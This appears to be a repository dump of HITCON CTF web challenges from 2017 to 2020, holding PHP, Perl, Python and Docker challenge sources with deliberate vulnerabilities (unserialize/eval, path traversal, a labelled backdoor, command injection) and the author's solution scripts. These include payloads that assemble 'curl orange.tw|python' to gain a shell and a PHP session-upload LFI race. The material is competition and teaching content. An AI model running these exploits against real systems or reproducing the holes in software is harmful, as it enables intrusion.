#{profile.outDescription}...
8 | Use your force to find the secret behind this website!
9 |
10 | If you are experienced in pentesting, you will solve it quickly :)
11 |
--------------------------------------------------------------------------------
/hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif
--------------------------------------------------------------------------------
/hitcon-ctf-2017/baby^h-master-php-2017/fork.py:
--------------------------------------------------------------------------------
1 | # coding: UTF-8
2 | # Author: orange@chroot.org
3 | #
4 |
5 | import requests
6 | import socket
7 | import time
8 | from multiprocessing.dummy import Pool as ThreadPool
9 | try:
10 | requests.packages.urllib3.disable_warnings()
11 | except:
12 | pass
13 |
14 | def run(i):
15 | while 1:
16 | HOST = '13.115.31.205'
17 | PORT = 80
18 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19 | s.connect((HOST, PORT))
20 | s.sendall('GET / HTTP/1.1\nHost: 54.238.212.199\nConnection: Keep-Alive\n\n')
21 | # s.close()
22 | print 'ok'
23 | time.sleep(0.5)
24 |
25 | i = 8
26 | pool = ThreadPool( i )
27 | result = pool.map_async( run, range(i) ).get(0xffff)
28 |
--------------------------------------------------------------------------------
/hitcon-ctf-2017/baby^h-master-php-2017/index.php:
--------------------------------------------------------------------------------
1 | avatar = $path;
18 | }
19 | }
20 |
21 | class Admin extends User {
22 | function __destruct(){
23 | $random = bin2hex(openssl_random_pseudo_bytes(32));
24 | eval("function my_function_$random() {"
25 | ." global \$FLAG; \$FLAG();"
26 | ."}");
27 | $_GET["lucky"]();
28 | }
29 | }
30 |
31 | function check_session() {
32 | global $SECRET;
33 | $data = $_COOKIE["session-data"];
34 | list($data, $hmac) = explode("-----", $data, 2);
35 | if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac))
36 | die("Bye");
37 | if ( !hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac) )
38 | die("Bye Bye");
39 |
40 | $data = unserialize($data);
41 | if ( !isset($data->avatar) )
42 | die("Bye Bye Bye");
43 | return $data->avatar;
44 | }
45 |
46 | function upload($path) {
47 | $data = file_get_contents($_GET["url"] . "/avatar.gif");
48 | if (substr($data, 0, 6) !== "GIF89a")
49 | die("Fuck off");
50 | file_put_contents($path . "/avatar.gif", $data);
51 | die("Upload OK");
52 | }
53 |
54 | function show($path) {
55 | if ( !file_exists($path . "/avatar.gif") )
56 | $path = "/var/www/html";
57 | header("Content-Type: image/gif");
58 | die(file_get_contents($path . "/avatar.gif"));
59 | }
60 |
61 | $mode = $_GET["m"];
62 | if ($mode == "upload")
63 | upload(check_session());
64 | else if ($mode == "show")
65 | show(check_session());
66 | else
67 | highlight_file(__FILE__);
68 |
--------------------------------------------------------------------------------
/hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from time import sleep
3 | from urllib import quote
4 |
5 | payload = [
6 | # generate "g> ht- sl" to file "v"
7 | '>dir',
8 | '>sl',
9 | '>g\>',
10 | '>ht-',
11 | '*>v',
12 |
13 | # reverse file "v" to file "x", content "ls -th >g"
14 | '>rev',
15 | '*v>x',
16 |
17 | # generate "curl orange.tw|python;"
18 | '>\;\\',
19 | '>on\\',
20 | '>th\\',
21 | '>py\\',
22 | '>\|\\',
23 | '>tw\\',
24 | '>e.\\',
25 | '>ng\\',
26 | '>ra\\',
27 | '>o\\',
28 | '>\ \\',
29 | '>rl\\',
30 | '>cu\\',
31 |
32 | # got shell
33 | 'sh x',
34 | 'sh g',
35 | ]
36 |
37 |
38 | r = requests.get('http://52.197.41.31/?reset=1')
39 | for i in payload:
40 | assert len(i) <= 4
41 | r = requests.get('http://52.197.41.31/?cmd=' + quote(i) )
42 | print i
43 | sleep(0.1)
44 |
45 |
--------------------------------------------------------------------------------
/hitcon-ctf-2017/babyfirst-revenge-v2/index.php:
--------------------------------------------------------------------------------
1 | g` file
7 | '>ls\\',
8 | 'ls>_',
9 | '>\ \\',
10 | '>-t\\',
11 | '>\>g',
12 | 'ls>>_',
13 |
14 | # generate `curl orange.tw|python`
15 | '>on',
16 | '>th\\',
17 | '>py\\',
18 | '>\|\\',
19 | '>tw\\',
20 | '>e.\\',
21 | '>ng\\',
22 | '>ra\\',
23 | '>o\\',
24 | '>\ \\',
25 | '>rl\\',
26 | '>cu\\',
27 |
28 | # exec
29 | 'sh _',
30 | 'sh g',
31 | ]
32 |
33 |
34 |
35 | r = requests.get('http://52.199.204.34/?reset=1')
36 | for i in payload:
37 | assert len(i) <= 5
38 | r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
39 | print i
40 | sleep(0.2)
41 |
42 |
--------------------------------------------------------------------------------
/hitcon-ctf-2017/babyfirst-revenge/index.php:
--------------------------------------------------------------------------------
1 |
3 |
4 |
5 |
6 |
7 |
8 | On my Raddit
9 |
10 |
11 |
12 |
17 |
30 |
31 |
32 |
33 |
34 | On my Raddit
35 | Flag is hitcon{ENCRYPTION_KEY}, and here is a hint for you :P
36 | P.S. If you fail in submitting the flag and want to argue with author, read the source first!
37 |
38 |
39 | Totoal: ${len(records)}
40 |
45 |
46 |
47 |
48 |
49 | Ups
50 | Title
51 | File
52 |
53 |
54 |
55 | $for r in records:
56 |
57 | $r['ups']
58 | $r['t']
59 | $if r['file'] :
60 | down
61 | $else:
62 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import string
3 | import requests
4 | from base64 import b64encode
5 | from random import sample, randint
6 | from multiprocessing.dummy import Pool as ThreadPool
7 |
8 |
9 |
10 | HOST = 'http://54.250.246.238/'
11 | sess_name = 'iamorange'
12 |
13 | headers = {
14 | 'Connection': 'close',
15 | 'Cookie': 'PHPSESSID=' + sess_name
16 | }
17 |
18 | payload = '@'
19 |
20 |
21 | while 1:
22 | junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
23 | x = b64encode(payload + junk)
24 | xx = b64encode(b64encode(payload + junk))
25 | xxx = b64encode(b64encode(b64encode(payload + junk)))
26 | if '=' not in x and '=' not in xx and '=' not in xxx:
27 | payload = xxx
28 | print payload
29 | break
30 |
31 | def runner1(i):
32 | data = {
33 | 'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
34 | }
35 | while 1:
36 | fp = open('/etc/passwd', 'rb')
37 | r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
38 | fp.close()
39 |
40 | def runner2(i):
41 | filename = '/var/lib/php/sessions/sess_' + sess_name
42 | filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
43 | # print filename
44 | while 1:
45 | url = '%s?orange=%s' % (HOST, filename)
46 | r = requests.get(url, headers=headers)
47 | c = r.content
48 | if c and 'orange' not in c:
49 | print [c]
50 |
51 |
52 | if sys.argv[1] == '1':
53 | runner = runner1
54 | else:
55 | runner = runner2
56 |
57 | pool = ThreadPool(32)
58 | result = pool.map_async( runner, range(32) ).get(0xffff)
59 |
60 |
--------------------------------------------------------------------------------
/hitcon-ctf-2018/one-line-php-challenge/src/index.php:
--------------------------------------------------------------------------------
1 |
2 |
34 |
35 |
36 |
37 |
38 |
39 |
40 | Why so Serials?
41 |
42 |
43 |
44 |
64 |
65 |
66 |
67 |
--------------------------------------------------------------------------------
/hitcon-ctf-2018/why-so-serials/src/web.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
7 |
8 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/bot/add_queue.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import sys, json
5 | from rq import Queue
6 | from redis import Redis
7 | from base64 import b64decode
8 |
9 | import bot
10 |
11 | try:
12 | with open('/bot/config.json', 'r') as fp:
13 | REDIS_PASSWORD = json.load(fp)['password']
14 | q = Queue(connection=Redis(password=REDIS_PASSWORD))
15 | q.enqueue(bot.add, b64decode(sys.argv[1]))
16 | print 'Done! Please waiting for the admin :)'
17 | except Exception as e:
18 | print 'Error[%s] Please contact admin' % e.message
19 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/bot/bot.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | from selenium import webdriver
5 | import time, sys, json, selenium
6 |
7 | # cd /bot/ && rq worker -v -u redis://:orangenogg@127.0.0.1:6379/
8 |
9 | def add(url):
10 | chrome_options = webdriver.ChromeOptions()
11 | chrome_options.add_argument('--headless')
12 | chrome_options.add_argument('--disable-gpu')
13 | chrome_options.add_argument('--disable-dev-shm-usage')
14 | # chrome_options.add_argument('--no-sandbox')
15 |
16 | with open('config.json', 'r') as fp:
17 | ADMIN_URL = json.load(fp)['admin_url']
18 |
19 | client = webdriver.Chrome(chrome_options=chrome_options)
20 | client.set_page_load_timeout(5)
21 | client.set_script_timeout(5)
22 | client.get(ADMIN_URL)
23 | client.get(url)
24 | i = 0
25 | while 1:
26 | try:
27 | client.switch_to_alert().accept()
28 | i += 1
29 | if i > 1000:
30 | break
31 | except selenium.common.exceptions.NoAlertPresentException:
32 | break
33 |
34 | time.sleep(2)
35 | client.quit()
36 |
37 | if __name__ == '__main__':
38 | add(sys.argv[1])
39 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/bot/config.json:
--------------------------------------------------------------------------------
1 | {
2 | "password": "orangenogg",
3 | "server_ip": "3.114.5.202",
4 | "base": "http://3.114.5.202/",
5 | "admin_url": "http://3.114.5.202/.admin.php",
6 | "flag": "hitcon{/FD 1s 0ur g0d <(_ _)>}"
7 | }
8 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/www/.admin.php:
--------------------------------------------------------------------------------
1 | server_ip) {
5 | setcookie("flag", $config->flag);
6 | }
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/www/fd.php:
--------------------------------------------------------------------------------
1 | 1) $q = str_replace("'", "", $q);
6 | if( substr_count($q, '"') > 1) $q = str_replace('"', "", $q);
7 | $host = $q . ".orange.ctf";
8 |
9 | ?>
10 |
11 |
12 |
13 |
14 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/bounty-pl33z/www/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | Report bugs to admin?
24 |
25 |
26 |
27 |
28 |
29 |
30 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | base)) != $config->base) {
54 | $msg = "Wrong URL :(";
55 | } else {
56 | $key = sprintf("lock_%s", $_SERVER['REMOTE_ADDR']);
57 | $redis = new Redis();
58 | $redis->connect('127.0.0.1', 6379);
59 | $redis->auth($config->password);
60 |
61 | if($redis->get($key) != null) {
62 | $msg = "Too fast :(";
63 | } else {
64 | $redis->set($key, "ok", 10);
65 | $msg = @exec("python /bot/add_queue.py " . base64_encode($url));
66 | }
67 | $redis->close();
68 | }
69 | echo $msg
70 |
71 | ?>
72 |
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/buggy-net/Default.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="C#" %>
2 |
3 |
4 |
5 |
6 |
7 |
8 |
19 |
20 |
21 |
22 |
23 |
24 |
25 | Buggy .Net
26 |
27 |
28 |
29 | Here is the source for you: Default.txt
30 |
31 |
32 |
33 |
34 |
35 |
46 |
47 |
48 |
49 |
50 |
51 |
52 | <%
53 |
54 | bool isBad = false;
55 | try {
56 | if ( Request.Form["filename"] != null ) {
57 | isBad = Request.Form["filename"].Contains("..") == true;
58 | }
59 | } catch (Exception ex) {
60 |
61 | }
62 |
63 | try {
64 | if (!isBad) {
65 | Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
66 | }
67 | } catch (Exception ex) {
68 |
69 | }
70 | %>
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:latest
2 | MAINTAINER orange@chroot.org
3 |
4 | EXPOSE 80/tcp
5 |
6 | WORKDIR /root/
7 | RUN apt-get update
8 | RUN apt install -y git make gcc libmysqlclient20
9 | RUN git clone https://github.com/embedthis/goahead.git
10 |
11 | WORKDIR /root/goahead/
12 | RUN git checkout v4.0.0
13 | RUN sed -i 's/DME_DEBUG=1/DME_DEBUG=0/' projects/goahead-linux-static.mk
14 | RUN make PROFILE=static ME_COM_SSL=0 ME_GOAHEAD_SSL=0 ME_COM_MBEDTLS=0 DEBUG=0
15 | RUN make -- DEBUG=0 ME_COM_MBEDTLS=0 ME_GOAHEAD_SSL=0 ME_COM_SSL=0 PROFILE=static install
16 |
17 | WORKDIR /etc/goahead
18 | RUN mkdir web/
19 | RUN mkdir cgi-bin/
20 | RUN sed -i 's/CGI/\x0\x0\x0/g' /usr/local/bin/goahead
21 | COPY db.conf .
22 | COPY route.txt .
23 | COPY index.html web/
24 | COPY query cgi-bin/
25 |
26 | COPY FLAG /
27 | CMD ["goahead", "-v"]
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/FLAG:
--------------------------------------------------------------------------------
1 | hitcon{Env1r0nm3nt 1nj3ct10n r0cks!!!}
2 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/db.conf:
--------------------------------------------------------------------------------
1 | dbhost=127.0.0.1
2 | dbuser=go
3 | dbpass=go
4 | dbname=go
5 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
17 |
45 |
46 |
47 |
48 |
49 |
50 |
51 | Query Names...
52 |
53 |
54 |
55 |
56 |
57 |
58 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/query:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2019/gogo-powersql/query
--------------------------------------------------------------------------------
/hitcon-ctf-2019/gogo-powersql/route.txt:
--------------------------------------------------------------------------------
1 | #
2 | # route.txt - Route and authorization configuration
3 | #
4 | # Schema
5 | # route uri=URI protocol=PROTOCOL methods=METHODS handler=HANDLER redirect=STATUS@URI \
6 | # extensions=EXTENSIONS abilities=ABILITIES
7 | #
8 | # Routes may require authentication and that users possess certain abilities.
9 | # The abilities, extensions, methods and redirect keywords use comma separated tokens to express a set of
10 | # required options, or use "|" separated tokens for a set of alternative options. This implements AND/OR.
11 | # The protocol keyword may be set to http or https. The redirect status may be "*" to match all HTTP status codes.
12 | # Multiple redirect fields are permissible.
13 | #
14 | # Examples:
15 | #
16 | # Universally redirect http to https for secure communications
17 | # route uri=/ protocol=http redirect=*@https handler=redirect
18 | #
19 | # Form based login pattern.
20 | # route uri=/pub/
21 | # route uri=/action/login methods=POST handler=action redirect=200@/ redirect=401@/pub/login.html
22 | # route uri=/action/logout methods=POST handler=action redirect=200@/pub/login.html
23 | # route uri=/ auth=form handler=continue redirect=401@/pub/login.html
24 | #
25 | # Sample basic or digest authentication for user "joshua"
26 | # route uri=/auth/basic/ auth=basic abilities=manage
27 | # route uri=/auth/digest/ auth=digest abilities=manage
28 | #
29 | # Eanable the PUT or DELETE methods (only) for the BIT_GOAHEAD_PUT_DIR directory
30 | # route uri=/put/ methods=PUT|DELETE
31 | #
32 | # Standard routes
33 | #
34 | route uri=/cgi-bin handler=cgi
35 | # route uri=/action handler=action
36 | # route uri=/ extensions=jst handler=jst
37 | # route uri=/ methods=OPTIONS|TRACE handler=options
38 |
39 | # For legacy GoAhead applications using /goform
40 | # route uri=/goform handler=action
41 |
42 | #
43 | # Catch-all route without authentication for all other URIs
44 | #
45 | route uri=/
46 |
47 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/luatic/config.php:
--------------------------------------------------------------------------------
1 | <");
7 | $TEST_KEY = bin2hex(random_bytes(32));
8 | $TEST_VALUE = bin2hex(random_bytes(32));
9 |
10 | function check_team_redis_status($token) {
11 | $status = exec("sudo /redis/cmd.py " . escapeshellarg($token) . " status");
12 | return trim($status);
13 | }
14 |
15 | function get_team_redis_port($token) {
16 | $status = exec("sudo /redis/cmd.py " . escapeshellarg($token) . " port");
17 | return (int)$status;
18 | }
19 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/luatic/luatic.php:
--------------------------------------------------------------------------------
1 | $v) {
6 | if( strlen($k) > 0 && preg_match('/^(FLAG|MY_|TEST_|GLOBALS)/i',$k) )
7 | exit('Shame on you');
8 | }
9 |
10 | foreach(Array('_GET','_POST') as $request) {
11 | foreach($$request as $k => $v) ${$k} = str_replace(str_split("[]{}=.'\""), "", $v);
12 | }
13 |
14 | if (strlen($token) == 0) highlight_file(__FILE__) and exit();
15 | if (!preg_match('/^[a-f0-9-]{36}$/', $token)) die('Shame on you');
16 |
17 | $guess = (int)$guess;
18 | if ($guess == 0) die('Shame on you');
19 |
20 | // Check team token
21 | $status = check_team_redis_status($token);
22 | if ($status == "Invalid token") die('Invalid token');
23 | if (strlen($status) == 0 || $status == 'Stopped') die('Start Redis first');
24 |
25 | // Get team redis port
26 | $port = get_team_redis_port($token);
27 | if ((int)$port < 1024) die('Try again');
28 |
29 | // Connect, we rename insecure commands
30 | // rename-command CONFIG ""
31 | // rename-command SCRIPT ""
32 | // rename-command MODULE ""
33 | // rename-command SLAVEOF ""
34 | // rename-command REPLICAOF ""
35 | // rename-command SET $MY_SET_COMMAND
36 | $redis = new Redis();
37 | $redis->connect("127.0.0.1", $port);
38 | if (!$redis->auth($token)) die('Auth fail');
39 |
40 | // Check availability
41 | $redis->rawCommand($MY_SET_COMMAND, $TEST_KEY, $TEST_VALUE);
42 | if ($redis->get($TEST_KEY) !== $TEST_VALUE) die('Something Wrong?');
43 |
44 | // Lottery!
45 | $LUA_LOTTERY = "math.randomseed(ARGV[1]) for i=0, ARGV[2] do math.random() end return math.random(2^31-1)";
46 | $seed = random_int(0, 0xffffffff / 2);
47 | $count = random_int(5, 10);
48 | $result = $redis->eval($LUA_LOTTERY, array($seed, $count));
49 |
50 | sleep(3); // Slow down...
51 | if ((int)$result === $guess)
52 | die("Congratulations, the flag is $FLAG");
53 | die(":(");
54 |
--------------------------------------------------------------------------------
/hitcon-ctf-2019/virtual-public-network/diag.cgi:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | use lib '/var/www/html/';
3 | use strict;
4 |
5 | use CGI ();
6 | use DSSafe;
7 |
8 |
9 | sub tcpdump_options_syntax_check {
10 | my $options = shift;
11 | return $options if system("timeout -s 9 2 /usr/bin/tcpdump -d $options >/dev/null 2>&1") == 0;
12 | return undef;
13 | }
14 |
15 | print "Content-type: text/html\n\n";
16 |
17 | my $options = CGI::param("options");
18 | my $output = tcpdump_options_syntax_check($options);
19 |
20 |
21 | # backdoor :)
22 | my $tpl = CGI::param("tpl");
23 | if (length $tpl > 0 && index($tpl, "..") == -1) {
24 | $tpl = "./tmp/" . $tpl . ".thtml";
25 | require($tpl);
26 | }
--------------------------------------------------------------------------------
/hitcon-ctf-2020/Return-of-Use-After-Flee/index.php:
--------------------------------------------------------------------------------
1 | $fid, 'beforeFid'=>$ext['currentFid']));
36 |
--------------------------------------------------------------------------------
/hitcon-ctf-2020/Return-of-Use-After-Flee/install.txt:
--------------------------------------------------------------------------------
1 | # CentOS 5.7
2 | # Apache 2.2.22
3 | ./configure --prefix=/usr/local/apache2 --sysconfdir=/etc/httpd --enable-rewrite=static --with-mpm=worker --enable-so --enable-proxy --enable-proxy-http --enable-deflate --enable-headers --enable-expires --with-included-apr
4 |
5 | # PHP 5.3.27
6 | ./configure --prefix=/usr/local/apache2/php --with-apxs2=/usr/local/apache2/bin/apxs --with-config-file-path=/usr/local/apache2/php --enable-mysqlnd
--------------------------------------------------------------------------------
/hitcon-ctf-2020/Return-of-Use-After-Flee/libphp5.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/Return-of-Use-After-Flee/libphp5.so
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell-wrapper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python -u
2 | import os, sys
3 | import pty
4 | import uuid
5 | import requests
6 | from time import sleep
7 | from tempfile import mkstemp
8 | from subprocess import check_output
9 |
10 | COLORS = {
11 | 'header': '\033[95m',
12 | 'blue': '\033[94m',
13 | 'cyan': '\033[96m',
14 | 'green': '\033[92m',
15 | 'warning': '\033[93m',
16 | 'fail': '\033[91m',
17 | 'endc': '\033[0m',
18 | 'bold': '\033[1m',
19 | 'underline': '\033[4m',
20 | 'blink': '\033[5m',
21 | }
22 |
23 | def check_token(token):
24 | def _is_valid_uuid(s):
25 | try:
26 | return uuid.UUID(s) is not None
27 | except:
28 | return False
29 |
30 | if _is_valid_uuid(token):
31 | r = requests.get('https://ctf2020.hitcon.org/team/token_auth?token=%s' % token)
32 | return r.json().get('id')
33 | # else:
34 | # if token == 'orange':
35 | # return True
36 |
37 | def my_exec(cmds):
38 | return check_output(cmds)
39 |
40 | def _color(s, color=''):
41 | code = COLORS.get(color)
42 | if code:
43 | return COLORS['bold'] + code + s + COLORS['endc'] + COLORS['endc']
44 | else:
45 | return s
46 |
47 | if __name__ == '__main__':
48 | token = raw_input(_color('Team token: ', 'bold')).strip()
49 | if not token or not check_token(token):
50 | print(_color('Bad token. Bye!\n', 'warning'))
51 | exit(-1)
52 |
53 | name = 'team-%s' % token
54 | cmds = [
55 | 'sudo',
56 | 'docker', 'ps', '-q',
57 | '-f', 'name=%s' % name
58 | ]
59 | container_id = my_exec(cmds)
60 | if container_id:
61 | print(_color('[*] Connecting to initialized instance...\n', 'bold'))
62 | else:
63 | print(_color('[*] Initializing instance...\n', 'bold'))
64 |
65 | _, tmp_name = mkstemp(prefix='%s_'%name, dir='/home/orange/tmp/')
66 | with open(tmp_name, 'wb+') as fp:
67 | fp.write('this-is-secret-' + os.urandom(8).encode('hex'))
68 |
69 | os.chmod(tmp_name, 0o444)
70 | cmds = [
71 | 'sudo',
72 | 'docker', 'rm', '-f', name
73 | ]
74 | try:
75 | with open(os.devnull, 'w') as devnull:
76 | check_output(cmds, stderr=devnull)
77 | except:
78 | pass
79 |
80 | cmds = [
81 | 'sudo',
82 | 'docker', 'run', '-d', '--rm',
83 | '--env', 'LOG_HOST=172.17.0.1',
84 | '-v', '%s:/enable.secret' % tmp_name,
85 | '--name', name,
86 | 'oshell'
87 | ]
88 | my_exec(cmds)
89 | sleep(2)
90 |
91 | cmds = [
92 | 'sudo',
93 | 'docker', 'exec', '-ti',
94 | '-u', 'oShell',
95 | name,
96 | 'python', '/oShell.py', 'tty'
97 | ]
98 |
99 | pty.spawn(cmds)
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.7
2 | MAINTAINER Orange Tsai
3 |
4 | # add user
5 | RUN adduser oShell -h / -s /bin/nologin -D -u 1337 -h /home/oShell/
6 |
7 | # copy file
8 | ADD oShell.py /
9 | ADD readflag /
10 | ADD flag /
11 | ADD tcpdump /bin/
12 |
13 |
14 | # cmd
15 | RUN apk update
16 | RUN apk add htop strace procps libcap python2
17 |
18 | # permission
19 | RUN chmod 400 /flag
20 | RUN chmod +s /readflag
21 | RUN chmod 774 /oShell.py
22 |
23 | # setup
24 | RUN setcap cap_net_raw=eip /bin/tcpdump cap_net_raw=eip /bin/busybox
25 | RUN rm -rf /usr/bin/top && sed -i 's/UNKNOWN/3.3.12 /g' /bin/top
26 |
27 | CMD ["sleep", "300"]
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | docker rm -f `docker ps -a -q`
4 | docker rmi -f oshell
5 |
6 | docker build . -t oshell
7 | # docker run -ti --name team-$1 -u oShell oshell
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/exp.txt:
--------------------------------------------------------------------------------
1 | enable
2 | ping
3 | tcpdump -w /home/oShell/.toprc icmp
4 |
5 | ping -c 1 13.115.220.111
6 |
7 | # https://github.com/PixelsCamp/ping-responder
8 | # echo net.ipv4.icmp_echo_ignore_all=1 | sudo tee /etc/sysctl.d/z01-disable_echo_reply.conf >/dev/null
9 | # systemctl restart systemd-sysctl
10 | echo -ne '\n\npipe\tOpen Files\ttouch /tmp/eeeeeeeeeeee\n\n' > payload
11 | python3 oshell-icmp.py -v -z -f payload
12 |
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/flag:
--------------------------------------------------------------------------------
1 | HITCON{A! AAAAAAAAAAAA! SHAR~K!!!}
2 |
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/oShell/oShell/readflag
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/readflag.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | // gcc -m32 -static -o readflag ./readflag.c
4 | int main(){
5 | char s[1024] = {0};
6 | FILE *fp = fopen("/flag", "rb");
7 | fread(&s, 1, 1024, fp);
8 | printf("%s", s);
9 | }
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oShell/oShell/tcpdump:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/oShell/oShell/tcpdump
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oStyle/bot.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # coding: utf-8
3 |
4 | import time, sys, json, selenium
5 | from redis import Redis
6 | from selenium import webdriver
7 | from rq import Connection, Worker, Queue
8 | import logging
9 |
10 | logging.getLogger('rq.worker').addHandler(logging.FileHandler("rq.log"))
11 | logging.getLogger('rq.worker').addHandler(logging.StreamHandler(sys.stdout))
12 |
13 |
14 | FLAG = 'hitcon{var flag.map(arbitrary-file-upload-to-XSS-again!)}'
15 | CONFIG = json.load(open('oStyle/config.json', 'rb'))
16 | URL_BASE = CONFIG.get('URL_BASE')
17 | REDIS_PASS = CONFIG.get('REDIS_PASS')
18 |
19 | def add(url):
20 | chrome_options = webdriver.ChromeOptions()
21 | chrome_options.add_argument('--headless')
22 | chrome_options.add_argument('--disable-gpu')
23 | chrome_options.add_argument('--disable-dev-shm-usage')
24 | chrome_options.add_experimental_option("prefs", {
25 | 'download.prompt_for_download': True,
26 | 'download.default_directory': '/dev/null'
27 | })
28 | # chrome_options.add_argument('--no-sandbox')
29 |
30 | client = webdriver.Chrome('./chromedriver', chrome_options=chrome_options)
31 | client.set_page_load_timeout(5)
32 | client.set_script_timeout(5)
33 |
34 | client.get(URL_BASE)
35 | client.add_cookie({
36 | 'name': 'this-is-for-you',
37 | 'value': FLAG,
38 | })
39 |
40 | with open('save_url.log', 'a+') as fp:
41 | print(url)
42 | fp.write(url + '\n')
43 | client.get(url)
44 | i = 0
45 | while 1:
46 | try:
47 | client.switch_to_alert().accept()
48 | i += 1
49 | if i > 1000:
50 | break
51 | except selenium.common.exceptions.NoAlertPresentException:
52 | break
53 |
54 | time.sleep(2)
55 | client.quit()
56 |
57 | if __name__ == '__main__':
58 | if 'test' in sys.argv:
59 | add(sys.argv[2])
60 | exit()
61 |
62 | with Connection(connection=Redis(host="127.0.0.1", password=REDIS_PASS)):
63 | w = Worker('default', log_job_description=True, serializer=json)
64 | w.work()
65 |
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oStyle/oStyle/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:latest
2 | EXPOSE 80
3 | ENV DEBIAN_FRONTEND=noninteractive
4 |
5 | RUN apt-get update && \
6 | apt-get install -y apache2 libapache2-mod-php7.4 python3 python3-pip
7 | RUN pip3 install rq
8 | RUN a2enmod headers
9 | RUN mkdir /var/www/html/upload && chmod 777 /var/www/html/upload/
10 | RUN rm /var/www/html/index.html
11 |
12 | ADD my_security.conf /etc/apache2/mods-enabled/
13 | ADD config.json /
14 | ADD www/* /var/www/html/
15 |
16 | CMD ["sh", "-c", "service apache2 start && tail -f /var/log/apache2/error.log"]
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oStyle/oStyle/config.json:
--------------------------------------------------------------------------------
1 | {
2 | "REDIS_HOST": "172.17.0.1",
3 | "REDIS_PASS": "fake-redis-pass",
4 | "URL_BASE": "http://52.68.87.21/"
5 | }
--------------------------------------------------------------------------------
/hitcon-ctf-2020/oStyle/oStyle/my_security.conf:
--------------------------------------------------------------------------------
1 | # Security Headers
2 |
3 | Header set X-Frame-Options "SAMEORIGIN"
4 | Header set X-Content-Type-Options "nosniff"
5 | Header set X-Frame-Options "DENY"
6 |
7 |
8 |
21 |
22 |
23 | Report a malicious URL to admin?
24 |
25 |
26 |
27 |
28 |
29 |
30 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
